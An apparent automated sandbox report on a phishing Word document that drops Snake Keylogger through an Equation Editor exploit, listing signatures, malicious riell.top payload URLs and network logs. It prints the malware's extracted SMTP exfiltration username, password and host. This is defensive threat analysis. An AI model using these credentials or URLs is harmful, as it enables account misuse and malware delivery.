Windows Analysis Report
OVER DUE INVOICE PAYMENT.docx

Overview

General Information

Sample name:	OVER DUE INVOICE PAYMENT.docx
Analysis ID:	1467922
MD5:	9f3fd4e8aa2ad81966d0c2a036d1e901
SHA1:	80a58393acb58fcc666e56b514994d98ba3f4716
SHA256:	cd9cf022180c8c6f6c4fb0d76476bf2e9382128d28a4686114c50448934e5381
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Microsoft Office launches external ms-search protocol handler (WebDAV)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Snake Keylogger

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

Contains an external reference to another file

Document exploit detected (process start blacklist hit)

Drops PE files with a suspicious file extension

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Microsoft Office drops suspicious files

Office drops RTF file

Office equation editor drops PE file

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Office viewer loads remote template

Sigma detected: Equation Editor Network Connection

Sigma detected: Suspicious Microsoft Office Child Process

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document contains Microsoft Equation 3.0 OLE entries

Document misses a certain OLE stream usually present in this Microsoft Office document type

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sigma detected: SCR File Write Event

Sigma detected: Suspicious DNS Query for IP Lookup Service APIs

Sigma detected: Suspicious Office Outbound Connections

Sigma detected: Suspicious Screensaver Binary File Creation

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Signatures

AV Detection

Antivirus detection for URL or domain

Source: https://riell.top/obb.scr

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{ACEFE1B1-39FF-4750-A188-3592D29053CF}.tmp

Avira: detection malicious, Label: EXP/CVE-2018-0798.Gen

Found malware configuration

Source: 0000000A.00000002.897811172.0000000002351000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "reservation@artefes.com", "Password": "ArtEfes4765*+", "Host": "mail.artefes.com", "Port": "587"}

Multi AV Scanner detection for domain / URL

Source: riell.top	Virustotal: Detection: 5%	Perma Link
Source: https://riell.top/obb.scr	Virustotal: Detection: 7%	Perma Link
Source: https://riell.top/obb.doc	Virustotal: Detection: 7%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scr	ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scr	Virustotal: Detection: 50%	Perma Link
Source: C:\Users\user\AppData\Roaming\obi23456.scr	ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Virustotal: Detection: 50%	Perma Link

Multi AV Scanner detection for submitted file

Source: OVER DUE INVOICE PAYMENT.docx	ReversingLabs: Detection: 34%
Source: OVER DUE INVOICE PAYMENT.docx	Virustotal: Detection: 26%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scr	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 188.114.97.3 Port: 443

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\obi23456.scr
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\obi23456.scr			Jump to behavior

Document contains Microsoft Equation 3.0 OLE entries

Source: ~WRF{ACEFE1B1-39FF-4750-A188-3592D29053CF}.tmp.0.dr

Stream path '_1781631827/\x1CompObj' : ...................F....Microsoft Equation 3.0....

Office Equation Editor has been started

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49162 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49164 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49173 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49168 version: TLS 1.2

Source:

Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: obi23456.scr, 00000009.00000002.374423269.0000000000460000.00000004.08000000.00040000.00000000.sdmp, obi23456.scr, 00000009.00000002.374657544.0000000002161000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_001C5038
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 001C7B81h	10_2_001C78C1
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 001C5D07h	10_2_001C5B18
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 001C6691h	10_2_001C5B18
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 001C8143h	10_2_001C7D30
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 001C6A01h	10_2_001C6740
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 001C72C1h	10_2_001C7000
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_001C584B
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 001C8143h	10_2_001C8072
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 001C6E61h	10_2_001C6BA0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 001C7721h	10_2_001C7460
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_001C566A
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F12D1h	10_2_003F1028
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003FC2D1h	10_2_003FC028
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F9711h	10_2_003F9468
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F46F1h	10_2_003F4448
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F4B49h	10_2_003F48A0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F1729h	10_2_003F1480
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003FC729h	10_2_003FC480
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F4FA1h	10_2_003F4CF8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F9B91h	10_2_003F98E8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F1B81h	10_2_003F18D8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003FCC15h	10_2_003FC8D8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F1FD9h	10_2_003F1D30
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F53F9h	10_2_003F5150
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F9FE9h	10_2_003F9D40
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	10_2_003F79AE
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F5851h	10_2_003F55A8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003FA441h	10_2_003FA198
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F2431h	10_2_003F2188
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003FA899h	10_2_003FA5F0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F2889h	10_2_003F25E0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F2CE1h	10_2_003F2A38
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F5CA9h	10_2_003F5A00
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003FACF1h	10_2_003FAA48
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003FB149h	10_2_003FAEA0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	10_2_003F7698
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F3139h	10_2_003F2E90
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F3591h	10_2_003F32E8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F05C9h	10_2_003F0320
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003FB5CAh	10_2_003FB320
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F0A21h	10_2_003F0778
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003FBA21h	10_2_003FB778
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F39E9h	10_2_003F3740
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F3E41h	10_2_003F3B98
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F4299h	10_2_003F3FF0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F0E79h	10_2_003F0BD0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003FBE79h	10_2_003FBBD0

Potential document exploit detected (performs DNS queries)

Source: global traffic	DNS query: name: riell.top
Source: global traffic	DNS query: name: riell.top
Source: global traffic	DNS query: name: riell.top
Source: global traffic	DNS query: name: riell.top
Source: global traffic	DNS query: name: riell.top
Source: global traffic	DNS query: name: riell.top
Source: global traffic	DNS query: name: riell.top
Source: global traffic	DNS query: name: riell.top
Source: global traffic	DNS query: name: riell.top
Source: global traffic	DNS query: name: riell.top
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: riell.top
Source: global traffic	DNS query: name: riell.top
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: riell.top
Source: global traffic	DNS query: name: riell.top
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: reallyfreegeoip.org

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 193.122.130.0:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 193.122.130.0:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 193.122.130.0:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 193.122.6.168:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 193.122.130.0:80
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 193.122.130.0:80
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 193.122.6.168:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
